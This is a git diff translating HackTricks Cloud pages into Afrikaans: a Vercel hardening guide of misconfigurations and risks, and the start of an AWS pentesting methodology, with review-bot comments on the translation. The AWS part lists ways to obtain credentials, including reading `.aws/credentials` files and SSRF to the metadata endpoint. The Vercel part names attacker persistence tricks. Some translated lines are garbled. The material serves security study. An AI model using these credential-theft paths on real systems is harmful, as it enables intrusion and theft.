-- **Risk:** Unauthorized users can access deployments, leading to data breaches or application misuse. +- **Misconfiguration:** Deaktiveer autentisering of nie afdwing van spanlid kontroles nie. +- **Risk:** Ongeoorloofde gebruikers kan toegang tot ontplooiings verkry, wat tot datalekke of toepassingsmisbruik kan lei. **Protection Bypass for Automation** -- **Misconfiguration:** Exposing the bypass secret publicly or using weak secrets. -- **Risk:** Attackers can bypass deployment protections, accessing and manipulating protected deployments. +- **Misconfiguration:** Blootstelling van die omseil geheime publiek of gebruik van swak geheime. +- **Risk:** Aanvallers kan ontplooiing beskermings omseil, toegang tot en manipulasie van beskermde ontplooiings verkry. **Shareable Links** -- **Misconfiguration:** Sharing links indiscriminately or failing to revoke outdated links. -- **Risk:** Unauthorized access to protected deployments, bypassing authentication and IP restrictions. +- **Misconfiguration:** Deel skakels sonder onderskeid of versuim om verouderde skakels in te trek. +- **Risk:** Ongeoorloofde toegang tot beskermde ontplooiings, wat autentisering en IP-beperkings omseil. **OPTIONS Allowlist** -- **Misconfiguration:** Allowlisting overly broad paths or sensitive endpoints. -- **Risk:** Attackers can exploit unprotected paths to perform unauthorized actions or bypass security checks. +- **Misconfiguration:** Laat te breĂ« paaie of sensitiewe eindpunte toe. +- **Risk:** Aanvallers kan onbeskermde paaie benut om ongeoorloofde aksies uit te voer of sekuriteitskontroles om te se. **Password Protection** -- **Misconfiguration:** Using weak passwords or sharing them insecurely. -- **Risk:** Unauthorized access to deployments if passwords are guessed or leaked. -- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month. +- **Misconfiguration:** Gebruik van swak wagwoorde of om dit onveilig te deel. 
+- **Risk:** Ongeoorloofde toegang tot ontplooiings as wagwoorde geraai of gelekt word. +- **Note:** Beskikbaar op die **Pro** plan as deel van **Advanced Deployment Protection** vir 'n addisionele $150/maand. **Deployment Protection Exceptions** -- **Misconfiguration:** Adding production or sensitive domains to the exception list inadvertently. -- **Risk:** Exposure of critical deployments to the public, leading to data leaks or unauthorized access. -- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month. +- **Misconfiguration:** Voeg produksie of sensitiewe domeine per ongeluk by die uitsonderingslys. +- **Risk:** Blootstelling van kritieke ontplooiings aan die publiek, wat tot datalekke of ongeoorloofde toegang kan lei. +- **Note:** Beskikbaar op die **Pro** plan as deel van **Advanced Deployment Protection** vir 'n addisionele $150/maand. **Trusted IPs** -- **Misconfiguration:** Incorrectly specifying IP addresses or CIDR ranges. -- **Risk:** Legitimate users being blocked or unauthorized IPs gaining access. -- **Note:** Available on the **Enterprise** plan. +- **Misconfiguration:** Onakkuraat spesifisering van IP adresse of CIDR reekse. +- **Risk:** Legitieme gebruikers wat geblokkeer word of ongeoorloofde IPs wat toegang verkry. +- **Note:** Beskikbaar op die **Enterprise** plan. --- ### Functions -**Purpose:** Configure serverless functions, including runtime settings, memory allocation, and security policies. +**Purpose:** Konfigureer serverless funksies, insluitend runtime instellings, geheue toewysing, en sekuriteitsbeleide. #### Security Configurations: 
@@ -167,81 +164,81 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro ### Data Cache -**Purpose:** Manage caching strategies and settings to optimize performance and control data storage. +**Purpose:** Bestuur caching strategieĂ« en instellings om prestasie te optimaliseer en data berging te beheer. #### Security Configurations: - **Purge Cache** - - **Misconfiguration:** It allows to delete all the cache. - - **Risk:** Unauthorized users deleting the cache leading to a potential DoS. +- **Misconfiguration:** Dit laat toe om al die cache te verwyder. +- **Risk:** Ongeoorloofde gebruikers wat die cache verwyder, wat tot 'n potensiĂ«le DoS kan lei. --- ### Cron Jobs -**Purpose:** Schedule automated tasks and scripts to run at specified intervals. +**Purpose:** Skeduleer geoutomatiseerde take en skripte om op spesifieke tydperke te loop. #### Security Configurations: - **Disable Cron Job** - - **Misconfiguration:** It allows to disable cron jobs declared inside the code - - **Risk:** Potential interruption of the service (depending on what the cron jobs were meant for) +- **Misconfiguration:** Dit laat toe om cron jobs wat in die kode verklaar is, te deaktiveer. +- **Risk:** PotensiĂ«le onderbreking van die diens (afhangende van waarvoor die cron jobs bedoel was) --- ### Log Drains -**Purpose:** Configure external logging services to capture and store application logs for monitoring and auditing. +**Purpose:** Konfigureer eksterne logging dienste om toepassingslogs te vang en te stoor vir monitering en oudit. #### Security Configurations: -- Nothing (managed from teams settings) +- Niks (bestuur vanaf spaninstellings) --- ### Security -**Purpose:** Central hub for various security-related settings affecting project access, source protection, and more. +**Purpose:** Sentraal hub vir verskeie sekuriteitsverwante instellings wat projek toegang, bron beskerming, en meer beĂŻnvloed. 
#### Security Configurations: **Build Logs and Source Protection** -- **Misconfiguration:** Disabling protection or exposing `/logs` and `/src` paths publicly. -- **Risk:** Unauthorized access to build logs and source code, leading to information leaks and potential exploitation of vulnerabilities. +- **Misconfiguration:** Deaktiveer beskerming of blootstelling van `/logs` en `/src` paaie publiek. +- **Risk:** Ongeoorloofde toegang tot boulogs en bronkode, wat tot inligtinglekke en potensiĂ«le uitbuiting van kwesbaarhede kan lei. **Git Fork Protection** -- **Misconfiguration:** Allowing unauthorized pull requests without proper reviews. -- **Risk:** Malicious code can be merged into the codebase, introducing vulnerabilities or backdoors. +- **Misconfiguration:** Laat ongeoorloofde pull versoeke toe sonder behoorlike hersienings. +- **Risk:** Kwaadwillige kode kan in die kodebasis saamgevoeg word, wat kwesbaarhede of agterdeure inbring. **Secure Backend Access with OIDC Federation** -- **Misconfiguration:** Incorrectly setting up OIDC parameters or using insecure issuer URLs. -- **Risk:** Unauthorized access to backend services through flawed authentication flows. +- **Misconfiguration:** Onakkurate opstelling van OIDC parameters of gebruik van onveilige issuer URL's. +- **Risk:** Ongeoorloofde toegang tot agtergrond dienste deur gebrekkige autentisering vloei. **Deployment Retention Policy** -- **Misconfiguration:** Setting retention periods too short (losing deployment history) or too long (unnecessary data retention). -- **Risk:** Inability to perform rollbacks when needed or increased risk of data exposure from old deployments. +- **Misconfiguration:** Stel retensieperiodes te kort (verlies van ontplooiing geskiedenis) of te lank (onnodige data retensie). +- **Risk:** OnvermoĂ« om terug te rol wanneer nodig of verhoogde risiko van datablootstelling van ou ontplooiings. 
**Recently Deleted Deployments** -- **Misconfiguration:** Not monitoring deleted deployments or relying solely on automated deletions. -- **Risk:** Loss of critical deployment history, hindering audits and rollbacks. +- **Misconfiguration:** Nie monitering van verwyderde ontplooiings of slegs op outomatiese verwyderings vertrou nie. +- **Risk:** Verlies van kritieke ontplooiing geskiedenis, wat oudit en terugrols bemoeilik. --- ### Advanced -**Purpose:** Access to additional project settings for fine-tuning configurations and enhancing security. +**Purpose:** Toegang tot addisionele projekinstellings vir fyninstelling van konfigurasies en verbetering van sekuriteit. #### Security Configurations: **Directory Listing** -- **Misconfiguration:** Enabling directory listing allows users to view directory contents without an index file. -- **Risk:** Exposure of sensitive files, application structure, and potential entry points for attacks. +- **Misconfiguration:** Aktivering van gidslys laat gebruikers toe om gidsinhoud te sien sonder 'n indekslĂȘer. +- **Risk:** Blootstelling van sensitiewe lĂȘers, toepassingsstruktuur, en potensiĂ«le toegangspunte vir aanvalle. --- 
@@ -253,13 +250,13 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro **Enable Attack Challenge Mode** -- **Misconfiguration:** Enabling this improves the defenses of the web application against DoS but at the cost of usability -- **Risk:** Potential user experience problems. +- **Misconfiguration:** Aktivering hiervan verbeter die verdediging van die webtoepassing teen DoS, maar ten koste van bruikbaarheid. +- **Risk:** PotensiĂ«le gebruikerservaring probleme. ### Custom Rules & IP Blocking -- **Misconfiguration:** Allows to unblock/block traffic -- **Risk:** Potential DoS allowing malicious traffic or blocking benign traffic +- **Misconfiguration:** Laat toe om verkeer te ontbloek/blokkeer. +- **Risk:** PotensiĂ«le DoS wat kwaadwillige verkeer toelaat of goedaardige verkeer blokkeer. --- 
@@ -267,13 +264,13 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro ### Source -- **Misconfiguration:** Allows access to read the complete source code of the application -- **Risk:** Potential exposure of sensitive information +- **Misconfiguration:** Laat toegang toe om die volledige bronkode van die toepassing te lees. +- **Risk:** PotensiĂ«le blootstelling van sensitiewe inligting. ### Skew Protection -- **Misconfiguration:** This protection ensures the client and server application are always using the same version so there is no desynchronizations were the client uses a different version from the server and therefore they don't understand each other. -- **Risk:** Disabling this (if enabled) could cause DoS problems in new deployments in the future +- **Misconfiguration:** Hierdie beskerming verseker dat die kliĂ«nt en bediener toepassing altyd dieselfde weergawe gebruik sodat daar geen desynchronisasies is waar die kliĂ«nt 'n ander weergawe as die bediener gebruik nie en daarom verstaan hulle mekaar nie. +- **Risk:** Deaktivering hiervan (as geaktiveer) kan DoS probleme in nuwe ontplooiings in die toekoms veroorsaak. --- @@ -284,11 +281,11 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro #### Security Configurations: - **Transfer** - - **Misconfiguration:** Allows to transfer all the projects to another team - - **Risk:** An attacker could steal the projects +- **Misconfiguration:** Laat toe om al die projekte na 'n ander span oor te dra. +- **Risk:** 'n Aanvaller kan die projekte steel. - **Delete Project** - - **Misconfiguration:** Allows to delete the team with all the projects - - **Risk:** Delete the projects +- **Misconfiguration:** Laat toe om die span met al die projekte te verwyder. +- **Risk:** Verwyder die projekte. --- 
@@ -297,8 +294,8 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro #### Security Configurations: - **Speed Insights Cost Limit** - - **Misconfiguration:** An attacker could increase this number - - **Risk:** Increased costs +- **Misconfiguration:** 'n Aanvaller kan hierdie nommer verhoog. +- **Risk:** Verhoogde koste. --- @@ -307,11 +304,11 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro #### Security Configurations: - **Add members** - - **Misconfiguration:** An attacker could maintain persitence inviting an account he control - - **Risk:** Attacker persistence +- **Misconfiguration:** 'n Aanvaller kan volharding handhaaf deur 'n rekening wat hy beheer, uit te nooi. +- **Risk:** Aanvaller volharding. - **Roles** - - **Misconfiguration:** Granting too many permissions to people that doesn't need it increases the risk of the vercel configuration. Check all the possible roles in [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles) - - **Risk**: Increate the exposure of the Vercel Team +- **Misconfiguration:** Te veel toestemmings aan mense wat dit nie nodig het nie, verhoog die risiko van die Vercel konfigurasie. Kontroleer al die moontlike rolle in [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles) +- **Risk**: Verhoog die blootstelling van die Vercel Span. --- 
@@ -321,11 +318,11 @@ An **Access Group** in Vercel is a collection of projects and team members with **Potential Misconfigurations:** -- **Over-Permissioning Members:** Assigning roles with more permissions than necessary, leading to unauthorized access or actions. -- **Improper Role Assignments:** Incorrectly assigning roles that do not align with team members' responsibilities, causing privilege escalation. -- **Lack of Project Segregation:** Failing to separate sensitive projects, allowing broader access than intended. -- **Insufficient Group Management:** Not regularly reviewing or updating Access Groups, resulting in outdated or inappropriate access permissions. -- **Inconsistent Role Definitions:** Using inconsistent or unclear role definitions across different Access Groups, leading to confusion and security gaps. +- **Over-Permissioning Members:** Toeken van rolle met meer toestemmings as wat nodig is, wat lei tot ongeoorloofde toegang of aksies. +- **Improper Role Assignments:** Onakkurate toekenning van rolle wat nie ooreenstem met spanlede se verantwoordelikhede nie, wat privilige eskalasie veroorsaak. +- **Lack of Project Segregation:** Versuim om sensitiewe projekte te skei, wat breĂ«r toegang toelaat as wat bedoel is. +- **Insufficient Group Management:** Nie gereeld hersiening of opdatering van Toegangsgroepe nie, wat lei tot verouderde of onvanpaste toegangstoestemmings. +- **Inconsistent Role Definitions:** Gebruik van inkonsekwente of onduidelike rol definisies oor verskillende Toegangsgroepe, wat lei tot verwarring en sekuriteitsgappe. --- @@ -334,8 +331,8 @@ An **Access Group** in Vercel is a collection of projects and team members with #### Security Configurations: - **Log Drains to third parties:** - - **Misconfiguration:** An attacker could configure a Log Drain to steal the logs - - **Risk:** Partial persistence +- **Misconfiguration:** 'n Aanvaller kan 'n Log Drain konfigureer om die logs te steel. +- **Risk:** Gedeeltelike volharding. --- 
@@ -343,99 +340,95 @@ An **Access Group** in Vercel is a collection of projects and team members with #### Security Configurations: -- **Team Email Domain:** When configured, this setting automatically invites Vercel Personal Accounts with email addresses ending in the specified domain (e.g., `mydomain.com`) to join your team upon signup and on the dashboard. - - **Misconfiguration:** - - Specifying the wrong email domain or a misspelled domain in the Team Email Domain setting. - - Using a common email domain (e.g., `gmail.com`, `hotmail.com`) instead of a company-specific domain. - - **Risks:** - - **Unauthorized Access:** Users with email addresses from unintended domains may receive invitations to join your team. - - **Data Exposure:** Potential exposure of sensitive project information to unauthorized individuals. -- **Protected Git Scopes:** Allows you to add up to 5 Git scopes to your team to prevent other Vercel teams from deploying repositories from the protected scope. Multiple teams can specify the same scope, allowing both teams access. - - **Misconfiguration:** Not adding critical Git scopes to the protected list. +- **Team Email Domain:** Wanneer geconfigureer, nooi hierdie instelling outomaties Vercel Persoonlike Rekeninge met e-pos adresse wat eindig op die gespesifiseerde domein (bv. `mydomain.com`) is om jou span te sluit by registrasie en op die dashboard. +- **Misconfiguration:** +- Spesifisering van die verkeerde e-pos domein of 'n verkeerd gespelde domein in die Span E-pos Domein instelling. +- Gebruik van 'n algemene e-pos domein (bv. `gmail.com`, `hotmail.com`) in plaas van 'n maatskappy-spesifieke domein. - **Risks:** - - **Unauthorized Deployments:** Other teams may deploy repositories from your organization's Git scopes without authorization. - - **Intellectual Property Exposure:** Proprietary code could be deployed and accessed outside your team. 
-- **Environment Variable Policies:** Enforces policies for the creation and editing of the team's environment variables. Specifically, you can enforce that all environment variables are created as **Sensitive Environment Variables**, which can only be decrypted by Vercel's deployment system. - - **Misconfiguration:** Keeping the enforcement of sensitive environment variables disabled. - - **Risks:** - - **Exposure of Secrets:** Environment variables may be viewed or edited by unauthorized team members. - - **Data Breach:** Sensitive information like API keys and credentials could be leaked. -- **Audit Log:** Provides an export of the team's activity for up to the last 90 days. Audit logs help in monitoring and tracking actions performed by team members. - - **Misconfiguration:**\ - Granting access to audit logs to unauthorized team members. - - **Risks:** - - **Privacy Violations:** Exposure of sensitive user activities and data. - - **Tampering with Logs:** Malicious actors could alter or delete logs to cover their tracks. -- **SAML Single Sign-On:** Allows customization of SAML authentication and directory syncing for your team, enabling integration with an Identity Provider (IdP) for centralized authentication and user management. - - **Misconfiguration:** An attacker could backdoor the Team setting up SAML parameters such as Entity ID, SSO URL, or certificate fingerprints. - - **Risk:** Maintain persistence -- **IP Address Visibility:** Controls whether IP addresses, which may be considered personal information under certain data protection laws, are displayed in Monitoring queries and Log Drains. - - **Misconfiguration:** Leaving IP address visibility enabled without necessity. - - **Risks:** - - **Privacy Violations:** Non-compliance with data protection regulations like GDPR. - - **Legal Repercussions:** Potential fines and penalties for mishandling personal data. 
-- **IP Blocking:** Allows the configuration of IP addresses and CIDR ranges that Vercel should block requests from. Blocked requests do not contribute to your billing. - - **Misconfiguration:** Could be abused by an attacker to allow malicious traffic or block legit traffic. - - **Risks:** - - **Service Denial to Legitimate Users:** Blocking access for valid users or partners. - - **Operational Disruptions:** Loss of service availability for certain regions or clients. +- **Unauthorized Access:** Gebruikers met e-pos adresse van onbedoelde domeine mag uitnodigings ontvang om by jou span aan te sluit. +- **Data Exposure:** PotensiĂ«le blootstelling van sensitiewe projekinligting aan ongeoorloofde individue. +- **Protected Git Scopes:** Laat jou toe om tot 5 Git scopes aan jou span toe te voeg om te voorkom dat ander Vercel spanne repositories van die beskermde omvang ontplooi. Meerdere spanne kan dieselfde omvang spesifiseer, wat beide spanne toegang gee. +- **Misconfiguration:** Nie kritieke Git scopes aan die beskermde lys toe te voeg nie. +- **Risks:** +- **Unauthorized Deployments:** Ander spanne mag repositories van jou organisasie se Git scopes sonder toestemming ontplooi. +- **Intellectual Property Exposure:** Beskermde kode kan ontplooi en buite jou span toeganklik wees. +- **Environment Variable Policies:** Handhaaf beleide vir die skepping en redigering van die span se omgewing veranderlikes. Spesifiek, jy kan afdwing dat alle omgewing veranderlikes geskep word as **Sensitive Environment Variables**, wat slegs deur Vercel se ontplooiingstelsel gedekodeer kan word. +- **Misconfiguration:** Hou die afdwinging van sensitiewe omgewing veranderlikes gedeaktiveer. +- **Risks:** +- **Exposure of Secrets:** Omgewing veranderlikes mag deur ongeoorloofde spanlede gesien of gewysig word. +- **Data Breach:** Sensitiewe inligting soos API sleutels en akrediteer kan gelekt word. +- **Audit Log:** Verskaf 'n uitvoer van die span se aktiwiteit vir tot die laaste 90 dae. 
Ouudit logs help om aksies wat deur spanlede uitgevoer is, te monitor en op te spoor. +- **Misconfiguration:**\ +Gee toegang tot oudit logs aan ongeoorloofde spanlede. +- **Risks:** +- **Privacy Violations:** Blootstelling van sensitiewe gebruikersaktiwiteite en data. +- **Tampering with Logs:** Kwaadwillige akteurs kan logs verander of verwyder om hul spore te bedek. +- **SAML Single Sign-On:** Laat aanpassing van SAML autentisering en gids sinkronisering vir jou span toe, wat integrasie met 'n Identiteitsverskaffer (IdP) vir gesentraliseerde autentisering en gebruikersbestuur moontlik maak. +- **Misconfiguration:** 'n Aanvaller kan 'n agterdeur in die Span instel deur SAML parameters soos Entity ID, SSO URL, of sertifikaat vingerafdrukke op te stel. +- **Risk:** Handhaaf volharding. +- **IP Address Visibility:** Beheer of IP adresse, wat as persoonlike inligting onder sekere dataprotectie wette beskou kan word, in Monitering navrae en Log Drains vertoon word. +- **Misconfiguration:** Laat IP adres sigbaarheid geaktiveer sonder noodsaaklikheid. +- **Risks:** +- **Privacy Violations:** Nie-nakoming van dataprotectie regulasies soos GDPR. +- **Legal Repercussions:** PotensiĂ«le boetes en sanksies vir verkeerde hantering van persoonlike data. +- **IP Blocking:** Laat die konfigurasie van IP adresse en CIDR reekse toe wat Vercel moet blokkeer. Geblokkeerde versoeke dra nie by tot jou fakturering nie. +- **Misconfiguration:** Kan deur 'n aanvaller misbruik word om kwaadwillige verkeer toe te laat of legitieme verkeer te blokkeer. +- **Risks:** +- **Service Denial to Legitimate Users:** Blokkeer toegang vir geldige gebruikers of vennote. +- **Operational Disruptions:** Verlies van diens beskikbaarheid vir sekere streke of kliĂ«nte. --- ### Secure Compute -**Vercel Secure Compute** enables secure, private connections between Vercel Functions and backend environments (e.g., databases) by establishing isolated networks with dedicated IP addresses. 
This eliminates the need to expose backend services publicly, enhancing security, compliance, and privacy. +**Vercel Secure Compute** stel veilige, private verbindings tussen Vercel Funksies en agtergrond omgewings (bv. databasisse) in deur geĂŻsoleerde netwerke met toegewyde IP adresse te vestig. Dit elimineer die behoefte om agtergrond dienste publiek bloot te stel, wat sekuriteit, nakoming, en privaatheid verbeter. #### **Potential Misconfigurations and Risks** 1. **Incorrect AWS Region Selection** - - **Misconfiguration:** Choosing an AWS region for the Secure Compute network that doesn't match the backend services' region. - - **Risk:** Increased latency, potential data residency compliance issues, and degraded performance. +- **Misconfiguration:** Kies 'n AWS streek vir die Secure Compute netwerk wat nie ooreenstem met die agtergrond dienste se streek nie. +- **Risk:** Verhoogde latensie, potensiĂ«le data verblyf nakoming probleme, en verswakte prestasie. 2. **Overlapping CIDR Blocks** - - **Misconfiguration:** Selecting CIDR blocks that overlap with existing VPCs or other networks. - - **Risk:** Network conflicts leading to failed connections, unauthorized access, or data leakage between networks. +- **Misconfiguration:** Kies CIDR blokke wat oorvleuel met bestaande VPCs of ander netwerke. +- **Risk:** Netwerk konflikte wat lei tot mislukte verbindings, ongeoorloofde toegang, of datalekke tussen netwerke. 3. **Improper VPC Peering Configuration** - - **Misconfiguration:** Incorrectly setting up VPC peering (e.g., wrong VPC IDs, incomplete route table updates). - - **Risk:** Unauthorized access to backend infrastructure, failed secure connections, and potential data breaches. +- **Misconfiguration:** Onakkurate opstelling van VPC peering (bv. verkeerde VPC ID's, onvolledige roete tabel opdaterings). +- **Risk:** Ongeoorloofde toegang tot agtergrond infrastruktuur, mislukte veilige verbindings, en potensiĂ«le datalekke. 4. 
**Excessive Project Assignments** - - **Misconfiguration:** Assigning multiple projects to a single Secure Compute network without proper isolation. - - **Risk:** Shared IP exposure increases the attack surface, potentially allowing compromised projects to affect others. +- **Misconfiguration:** Toeken van meerdere projekte aan 'n enkele Secure Compute netwerk sonder behoorlike isolasie. +- **Risk:** Gedeelde IP blootstelling verhoog die aanval oppervlak, wat moontlik gekompromitteerde projekte toelaat om ander te beĂŻnvloed. 5. **Inadequate IP Address Management** - - **Misconfiguration:** Failing to manage or rotate dedicated IP addresses appropriately. - - **Risk:** IP spoofing, tracking vulnerabilities, and potential blacklisting if IPs are associated with malicious activities. +- **Misconfiguration:** Versuim om toegewyde IP adresse behoorlik te bestuur of te roteer. +- **Risk:** IP spoofing, opsporing kwesbaarhede, en potensiĂ«le swartlys as IP's geassosieer word met kwaadwillige aktiwiteite. 6. **Including Build Containers Unnecessarily** - - **Misconfiguration:** Adding build containers to the Secure Compute network when backend access isn't required during builds. - - **Risk:** Expanded attack surface, increased provisioning delays, and unnecessary consumption of network resources. +- **Misconfiguration:** Voeg bouhouers by die Secure Compute netwerk wanneer agtergrond toegang nie tydens boue benodig word nie. +- **Risk:** Verhoogde aanval oppervlak, verhoogde voorsieningsvertraagings, en onnodige verbruik van netwerk hulpbronne. 7. **Failure to Securely Handle Bypass Secrets** - - **Misconfiguration:** Exposing or mishandling secrets used to bypass deployment protections. - - **Risk:** Unauthorized access to protected deployments, allowing attackers to manipulate or deploy malicious code. +- **Misconfiguration:** Blootstelling of verkeerde hantering van geheime wat gebruik word om ontplooiing beskermings te omseil. 
+- **Risk:** Ongeoorloofde toegang tot beskermde ontplooiings, wat aanvallers toelaat om kwaadwillige kode te manipuleer of te ontplooi. 8. **Ignoring Region Failover Configurations** - - **Misconfiguration:** Not setting up passive failover regions or misconfiguring failover settings. - - **Risk:** Service downtime during primary region outages, leading to reduced availability and potential data inconsistency. +- **Misconfiguration:** Nie passiewe failover streke op te stel of failover instellings verkeerd te konfigureer nie. +- **Risk:** Diens stilstand tydens primĂȘre streek uitvalle, wat lei tot verminderde beskikbaarheid en potensiĂ«le datainkonsekwentheid. 9. **Exceeding VPC Peering Connection Limits** - - **Misconfiguration:** Attempting to establish more VPC peering connections than the allowed limit (e.g., exceeding 50 connections). - - **Risk:** Inability to connect necessary backend services securely, causing deployment failures and operational disruptions. +- **Misconfiguration:** Poging om meer VPC peering verbindings te vestig as die toegelate limiet (bv. meer as 50 verbindings). +- **Risk:** OnvermoĂ« om nodige agtergrond dienste veilig te verbind, wat ontplooiing mislukkings en operasionele onderbrekings veroorsaak. 10. **Insecure Network Settings** - - **Misconfiguration:** Weak firewall rules, lack of encryption, or improper network segmentation within the Secure Compute network. - - **Risk:** Data interception, unauthorized access to backend services, and increased vulnerability to attacks. +- **Misconfiguration:** Swak firewall reĂ«ls, gebrek aan versleuteling, of onvanpaste netwerk segmentasie binne die Secure Compute netwerk. +- **Risk:** Data afluistering, ongeoorloofde toegang tot agtergrond dienste, en verhoogde kwesbaarheid vir aanvalle. --- ### Environment Variables -**Purpose:** Manage environment-specific variables and secrets used by all the projects. 
+**Purpose:** Bestuur omgewing-spesifieke veranderlikes en geheime wat deur al die projekte gebruik word. #### Security Configurations: - **Exposing Sensitive Variables** - - **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side. - - **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches. +- **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side. +- **Risk:** Blootstelling van API sleutels, databasis akrediteer, of ander sensitiewe data aan die publiek, wat tot datalekke lei. - **Sensitive disabled** - - **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets. - - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. +- **Misconfiguration:** As gedeaktiveer (standaard) is dit moontlik om die waardes van die gegenereerde geheime te lees. +- **Risk:** Verhoogde waarskynlikheid van toevallige blootstelling of ongeoorloofde toegang tot sensitiewe inligting. {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/README.md b/src/pentesting-cloud/aws-security/README.md index ad71de826..09bc05707 100644 --- a/src/pentesting-cloud/aws-security/README.md +++ b/src/pentesting-cloud/aws-security/README.md 
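Review bot: in the Secure Compute / Environment Variables hunk above, the `Misconfiguration`/`Risk` sub-bullets under items 5 to 10 and under **Exposing Sensitive Variables** / **Sensitive disabled** lost their two-space indentation (`  - **Misconfiguration:**` became `- **Misconfiguration:**`), so they no longer nest under the numbered items and the list will render as a flat mix of numbers and bullets; re-indent them to match the English version. The line `+- **Misconfiguration:** Prefixing sensitive variables with \`NEXT_PUBLIC_\`, making them accessible on the client side.` was left in English while its sibling `Risk` line was translated, and "backend access" was rendered as `agtergrond toegang` (agtergrond means background); keep `backend` as the technical term, as the rest of the repo does.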
@@ -2,17 +2,17 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Basiese Inligting -**Before start pentesting** an **AWS** environment there are a few **basics things you need to know** about how AWS works to help you understand what you need to do, how to find misconfigurations and how to exploit them. +**Voordat jy begin pentesting** 'n **AWS** omgewing, is daar 'n paar **basiese dinge wat jy moet weet** oor hoe AWS werk om jou te help verstaan wat jy moet doen, hoe om miskonfigurasies te vind en hoe om dit te benut. -Concepts such as organization hierarchy, IAM and other basic concepts are explained in: +Konsepte soos organisasiehiĂ«rargie, IAM en ander basiese konsepte word verduidelik in: {{#ref}} aws-basic-information/ {{#endref}} -## Labs to learn +## Laboratoriums om te leer - [https://github.com/RhinoSecurityLabs/cloudgoat](https://github.com/RhinoSecurityLabs/cloudgoat) - [https://github.com/BishopFox/iam-vulnerable](https://github.com/BishopFox/iam-vulnerable) 
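Review bot: `**Voordat jy begin pentesting** 'n **AWS** omgewing` keeps the English word order; Afrikaans puts the verb at the end of the subordinate clause, so `Voordat jy 'n AWS-omgewing begin pentest` reads correctly.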
@@ -22,49 +22,49 @@ aws-basic-information/ - [http://flaws.cloud/](http://flaws.cloud/) - [http://flaws2.cloud/](http://flaws2.cloud/) -Tools to simulate attacks: +Gereedskap om aanvalle te simuleer: - [https://github.com/Datadog/stratus-red-team/](https://github.com/Datadog/stratus-red-team/) - [https://github.com/sbasu7241/AWS-Threat-Simulation-and-Detection/tree/main](https://github.com/sbasu7241/AWS-Threat-Simulation-and-Detection/tree/main) -## AWS Pentester/Red Team Methodology +## AWS Pentester/Red Team Metodologie -In order to audit an AWS environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal AWS services an **external services** connected. +Om 'n AWS omgewing te oudit, is dit baie belangrik om te weet: watter **dienste gebruik word**, wat is **blootgestel**, wie het **toegang** tot wat, en hoe is interne AWS dienste en **eksterne dienste** gekoppel. -From a Red Team point of view, the **first step to compromise an AWS environment** is to manage to obtain some **credentials**. Here you have some ideas on how to do that: +Vanuit 'n Red Team perspektief, is die **eerste stap om 'n AWS omgewing te kompromitteer** om daarin te slaag om 'n paar **akkrediteerbare** te verkry. 
Hier is 'n paar idees oor hoe om dit te doen: -- **Leaks** in github (or similar) - OSINT -- **Social** Engineering -- **Password** reuse (password leaks) -- Vulnerabilities in AWS-Hosted Applications - - [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint - - **Local File Read** - - `/home/USERNAME/.aws/credentials` - - `C:\Users\USERNAME\.aws\credentials` -- 3rd parties **breached** -- **Internal** Employee -- [**Cognito** ](aws-services/aws-cognito-enum/#cognito)credentials +- **Leaks** in github (of soortgelyk) - OSINT +- **Sosiale** Ingenieurswese +- **Wagwoord** hergebruik (wagwoordlekke) +- Kw vulnerabilities in AWS-gehoste toepassings +- [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) met toegang tot metadata-eindpunt +- **Plaaslike LĂȘer Lees** +- `/home/USERNAME/.aws/credentials` +- `C:\Users\USERNAME\.aws\credentials` +- 3de partye **gekompromitteer** +- **Interne** Werknemer +- [**Cognito** ](aws-services/aws-cognito-enum/#cognito)akkrediteerbare -Or by **compromising an unauthenticated service** exposed: +Of deur **'n nie-geauthentiseerde diens** wat blootgestel is te kompromitteer: {{#ref}} aws-unauthenticated-enum-access/ {{#endref}} -Or if you are doing a **review** you could just **ask for credentials** with these roles: +Of as jy 'n **hersiening** doen, kan jy net **vraag vir akkrediteerbare** met hierdie rolle: {{#ref}} aws-permissions-for-a-pentest.md {{#endref}} > [!NOTE] -> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration: +> Nadat jy daarin geslaag het om akkrediteerbare te verkry, moet jy weet **aan wie behoort daardie akkrediteerbare**, en **waartoe hulle toegang het**, so jy moet 'n paar basiese enumerasie uitvoer: -## Basic Enumeration +## 
Basiese Enumerasie ### SSRF -If you found a SSRF in a machine inside AWS check this page for tricks: +As jy 'n SSRF in 'n masjien binne AWS gevind het, kyk na hierdie bladsy vir truuks: {{#ref}} https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf @@ -72,8 +72,7 @@ https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/clou ### Whoami -One of the first things you need to know is who you are (in where account you are in other info about the AWS env): - +Een van die eerste dinge wat jy moet weet is wie jy is (in watter rekening jy is en ander inligting oor die AWS omgewing): ```bash # Easiest way, but might be monitored? aws sts get-caller-identity 
